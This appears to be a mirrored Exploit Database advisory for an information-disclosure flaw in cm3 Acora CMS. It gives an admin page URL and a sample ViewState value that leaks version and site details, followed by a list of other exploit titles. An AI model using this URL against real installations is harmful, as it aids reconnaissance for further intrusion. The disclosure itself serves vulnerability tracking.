cm3 Acora CMS – ‘top.aspx’ Information Disclosure

Exploit Database
40 阅读

作者： Pedro Andujar

日期： 2013-08-26
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/38740/

source: https://www.securityfocus.com/bid/62010/info

cm3 Acora CMS is prone to an information-disclosure vulnerability.

Successful exploits of this issue lead to disclosure of sensitive information which may aid in launching further attacks. 

http://www.example.com/AcoraCMS/Admin/top.aspx

<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTQ4NjIxMDUxOQ9kFgJmD2QWAgIDD2QWAgIBD2QWCmYPFgIeBFRleHQFJERpZ2l0YWxTZWMgTmV0d29ya3MgV2Vic2l0ZWQCAQ8WAh8ABQpFbnRlcnByaXNlZAICDw8WAh8ABQt2NS40LjUvNGEtY2RkAgMPFgIfAAUgQW5vbnltb3VzIChQdWJsaWMgSW50ZXJuZXQgVXNlcilkAgQPDxYCHgdWaXNpYmxlaGRkZIL9u8OSlqqnBHGwtssOBV5lciAoCg" /></div>

last Exploits
cm3 Acora CMS – ‘top.aspx’ Information Disclosure的更多信息

Nakid CMS 0.5.2 – Remote File Inclusion：
XM Forum – ‘id’ Multiple SQL Injections：
Restaurant Management System 1.0 – Remote Code Execution：
Openplanning 1.00 – Local File Inclusion / Remote File Inclusion：
systemsoftware Community Black – ‘index.php’ SQL Injection：
LEPTON 2.2.2 – Remote Code Execution：
FormaLMS 2.4.4 – Authentication Bypass：
Wavlink WN533A8 – Cross-Site Scripting (XSS)：